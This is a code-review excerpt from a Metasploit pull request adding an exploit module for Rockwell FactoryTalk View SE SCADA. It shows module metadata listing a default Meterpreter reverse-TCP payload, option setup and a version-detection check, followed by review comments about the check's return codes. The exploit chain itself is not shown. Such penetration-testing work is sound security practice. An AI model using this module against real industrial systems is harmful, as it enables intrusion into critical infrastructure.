modules/exploits/windows/scada/rockwell_factorytalk_rce.rb

```diff
@@ -0,0 +1,224 @@
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
+          'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module
+        ],
+        'References' =>
+          [
+            [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'],
+            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md'],
+            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md'],
+            [ 'CVE', '2020-12027'],
+            [ 'CVE', '2020-12028'],
+            [ 'CVE', '2020-12029'],
+            [ 'ZDI', '20-727'],
+            [ 'ZDI', '20-728'],
+            [ 'ZDI', '20-729'],
+            [ 'ZDI', '20-730'],
+          ],
+        'Privileged' => false,
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Payload' => {
+          'DefaultOptions' =>
+            {
+              'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+            }
+        },
+        'DefaultOptions' => { 'WfsDelay' => 20 },
+        'Targets' =>
+          [
+            [ 'Rockwell Automation FactoryTalk SE', {} ]
+          ],
+        'DisclosureDate' => '2020-06-22',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit']),
+        OptInt.new('SRVPORT', [true, 'Port of the host serving the exploit on', 8080]),
+        OptString.new('TARGETURI', [true, 'The base path to Rockwell FactoryTalk', '/rsviewse/'])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new('SLEEP_RACER', [true, 'Number of seconds to wait for racer thread to finish', 15]),
+      ]
+    )
+  end
+
+  def send_to_factory(path)
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri, path),
+      'method' => 'GET'
+    })
+  end
+
+  def check
+    res = send_to_factory('/hmi_isapi.dll')
+    return Exploit::CheckCode::Safe unless res && res.code == 200
+
+    # Parse version from response body
+    # Example: Version 11.00.00.230
+    version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')
+
+    # Is returned version sound?
+    unless version.empty?
+      if version.length != 4
+        return Exploit::CheckCode::Detected
+      end
+
+      print_status("#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join('.')}")
+      if version[0].to_i == 11 && version[1].to_i == 0 && version[2].to_i == 0 && version[3].to_i == 230
+        # we know this exact version is vulnerable (11.00.00.230)
+        return Exploit::CheckCode::Appears
+      end
+    end
+
+    return Exploit::Checkcode::Unknown
+  end
```

Comment:
Here's what I believe gwilcox was suggesting. I also raised this earlier. https://github.com/rapid7/metasploit-framework/pull/14206#discussion_r497973542

```suggestion
  def check
    res = send_to_factory('/hmi_isapi.dll')
    return CheckCode::Safe unless res && res.code == 200

    # Parse version from response body
    # Example: Version 11.00.00.230
    version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')

    # Is returned version sound?
    if version.empty?
      return Checkcode::Safe
    end

    if version.length != 4
      return CheckCode::Detected
    end

    print_status("#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join('.')}")
    if version[0].to_i == 11 && version[1].to_i == 0 && version[2].to_i == 0 && version[3].to_i == 230
      # we know this exact version is vulnerable (11.00.00.230)
      return CheckCode::Appears
    end

    CheckCode::Detected
  end
```

Reply:
Fixed in commit a5024238d3a01adceb9615bcd0b695036baf47f5. The larger default is still Unknown though, but I think that's sufficient. If it says it detected Rockwell, it returns `CheckCode::Detected` now and that's the important thing.